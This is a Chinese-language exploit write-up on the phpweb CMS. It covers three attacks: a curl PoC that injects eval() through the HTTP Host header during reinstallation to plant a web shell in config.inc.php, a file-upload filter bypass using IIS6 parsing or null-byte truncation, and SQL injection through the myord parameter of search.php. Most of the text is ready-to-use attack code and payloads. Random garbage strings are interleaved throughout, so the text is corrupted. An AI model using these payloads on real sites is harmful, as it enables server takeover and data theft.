phpweb成品网站最新版(注入、上传、写shell)

admin

注入：

之所以鸡肋就是该漏洞利用安装文件 重新生成 配置文件 写入可执行代码

鸡肋1： 具有破坏性 动作非常大 重新写了配置文件 数据库连接文件
鸡肋2： 有一定安全常识的站长都会删掉 install 目录
! F( ?) ?2 Q3 A
虽然鸡肋 但也有优点 ： 不受 magic_quotes_gpc 、 webserver 影响

分析：
# K7 v3 Y  C+ u) L6 H( h. g& Z) p

$siteurl="http://".$_SERVER["HTTP_HOST"]."/";    //未过滤
* K- y- \$ D! Y- ~" O6 a5 S
' f) V" o  U% ^1 S1 {4 A( S                                            $filestr = fread(fopen($SysConfigFile, 'r'),30000);
                                            $filestr=str_replace(" ","",$filestr);
                                            $filestr=str_replace("DefaultDbHost",$dbhost,$filestr);
                                            $filestr=str_replace("DefaultDbName",$dbname,$filestr);
                                            $filestr=str_replace("DefaultDbUser",$dbuser,$filestr);
                                            $filestr=str_replace("DefaultDbPass",$dbpwd,$filestr);
                                            $filestr=str_replace("DefaultsLan","zh_cn",$filestr);
                                            $filestr=str_replace("DefaultTablePre",$tablepre,$filestr);
* {: d3 [! S/ j# N                                            $filestr=str_replace("DefaultSiteUrl",$siteurl,$filestr);
( F/ {$ q- z9 v7 E9 e: \1 Y/ w
) C* g6 I' ]2 e9 n+ Z, b% F6 W                                            fwrite(fopen($ConFile,"w"),$filestr,30000);
3 {, ^+ F# B' H4 Z) |, V/ J$_SERVER["HTTP_HOST"] 就是 http head 中HOST传递过来的 可控制,并且不受 magic_quotes_gpc 影响 ^ _ ^
4 m! S( u( F! q! W3 H
. \% P# i+ k9 opoc：

0 m8 N% Y  J$ `/ |?
1 K. b7 E9 }, d) |7 a2 L8 n9 d1
  N5 I" J( C! u) |( m8 dcurl http://fuck.0day5.com/base/install/index.php --data "dbhost=localhost&dbname=phpweb&dbuser=root&dbpwd=root&tablepre=pwn&nextstep=3&command=gonext&alertmsg=&username=" --header "HOST:localhost\";eval($_REQUEST[a]);#"
shell地址: /config.inc.php
跟之前的 phpcms一样 需要远程数据库

——————————————————–
( p* ^7 W( a2 u0 O6 ?上传漏洞(需要进后台)：
/ I: ?5 s) q! W0 X0 T5 M漏洞文件: /kedit/upload_cgi/upload.php
这个很多人都知道,但是很鸡肋 iis6 解析 或 GPC off条件下才可利用


<?php
( k/ V; w/ d, u' Q; `% C9 W    define("ROOTPATH", "../../");
5 U, i; q; E! X& D4 ^7 v& w' X    include(ROOTPATH."includes/admin.inc.php");
    NeedAuth(0);

    $dt=date("Ymd",time());
    if(!is_dir(ROOTPATH.$_POST['attachPath'].$dt)){
1 F& O1 V0 `* W& \4 m" F& k) O, Z            @mkdir(ROOTPATH.$_POST['attachPath'].$dt,0777);
    }

    //文件保存目录路径
" O5 E, k" L/ W/ }    $save_path = ROOTPATH.$_POST['attachPath'].$dt.'/';
' x6 a& [3 W; g* `8 Z/ O. v" y    echo $save_path;
    //文件保存目录URL
: |: @  [  b% V. H3 u. P- w    $save_url = '../../'.$_POST['attachPath'].$dt.'/';

( G) e) }, e( q1 {; e* O    //定义允许上传的文件扩展名
% Y9 ?7 ^1 s' j: t' Z4 j/ }    $ext_arr = array('gif','jpg','png','bmp'); //限制后缀

    //最大文件大小
    $max_size = 1000000;

' {/ G* J8 L- J. E    //更改目录权限
    @mkdir($save_path, 0777);

) g8 C: r1 [) A* W    //文件的全部路径
    $file_path = $save_path.$_POST['fileName'];   //保存文件名

    //文件URL
( b" |& Z- B. U; W8 C7 f: b    $file_url = $save_url.$_POST['fileName'];
' n; G% O/ {3 R9 t5 o2 ~//有上传文件时
    if (empty($_FILES) === false) {
- x) U! B! a; Y  v( \4 Q$ k( _
            //原文件名
' p3 F: Y- b+ j8 p            $file_name = $_FILES['fileData']['name'];
' t  L  w* T6 ?& U+ ]6 X9 ~# S            //服务器上临时文件名
# ]# W+ w* m+ v0 Y. v            $tmp_name = $_FILES['fileData']['tmp_name'];
4 a, d: C, e! N2 @* \( h8 e. q            //文件大小
7 a8 Y( [" n+ v            $file_size = $_FILES['fileData']['size'];
            //检查目录
            if (@is_dir($save_path) === false) {
6 i3 P# U& c. t                    alert("上传目录不存在。");
            }
            //检查目录写权限
8 }+ V  r  q9 T* @+ y2 t            if (@is_writable($save_path) === false) {
                    alert("上传目录没有写权限。");
            }
            //检查是否已上传
            if (@is_uploaded_file($tmp_name) === false) {
                    alert("临时文件可能不是上传文件。");
            }
/ Z  k4 W" }$ Q            //检查文件大小
            if ($file_size > $max_size) {
) f' C) R6 u* i; `& o                    alert("上传文件大小超过限制。");
            }
; q* ?# t  z' t# f            //获得文件扩展名
9 J: p! ^) u4 {            $temp_arr = explode(".", $_POST['fileName']);
; V' K; ^/ x; ]            $file_ext = array_pop($temp_arr);
            $file_ext = trim($file_ext);
% j0 c* R. k# Z3 G" ~: _            $file_ext = strtolower($file_ext);
) J% L/ s+ ]$ K( y8 p% B+ d3 W! I; ~
9 q1 W9 d" O6 N+ y9 a+ u            //检查扩展名   
            if (in_array($file_ext, $ext_arr) === false) {     
                    alert("上传文件扩展名是不允许的扩展名。");
            }

6 `4 Q5 ~9 x# ~            //移动文件   
            //未重命名 虽然过滤了 后缀   iis 6解析漏洞 ^ _ ^
            if (move_uploaded_file($tmp_name, $file_path) === false) {
                    alert("上传文件失败。");
            }

6 H: h- m3 L. C6 }* v/ T- Z5 |7 m! A# q            @chmod($file_path,0666);

6 ^2 W4 ?* t( ^6 ]. e1 x    ?>
抓包改包 filename 改为 xx.php;111.jpg 即可突破或者使用http://www.0day5.com/?p=227
* v: _3 A2 J5 _. ?& Y
7 F- n3 n" f% Z, o2 vapache 版本magic_quotes_gpc = off情况下可以考虑 \00 截断 绕过

——————————————————
注入漏洞：
漏洞文件:search/module/search.php
/search/index.php?key=1&myord=1 [sqlinjection]
# c1 [8 f" ]; P/ T$ t

* k$ G( g' w0 H/ V* ^# f<?php
   //       ... 省略 n 行...
- L* B& H8 b) a- _8 O( D4 b+ ~   //第18行:
           $key=htmlspecialchars($_GET["key"]);   //只是简单的将字符HTML 实体 编码   , mysql 注入不受此影响
           $page=htmlspecialchars($_GET["page"]);
           $myord=htmlspecialchars($_GET["myord"]);
/ e% Z: b  G' I  J
   //       ... 省略 n 行...
   $key,$myord 两个参数带入查询
   //第47行 $key:
2 h4 s7 g, w8 \" v8 B
   $fsql->query("select count(id) from {P}_news_con where iffb='1' and catid!='0' and (title regexp '$key' or body regexp '$key')");  //虽然带入查询 但使用的 是regexp 不知如何绕过..
/ z. f) S0 h" y
   //第197行 $myord
9 ]" f( @! I7 w  Y3 v7 O( w% O- {# a   $fsql->query($scl . " order by $myord desc limit $pagelimit ");    产生注入
( c& ^4 l# F6 K
9 p# R: r1 g6 B) U& L1 C   ?>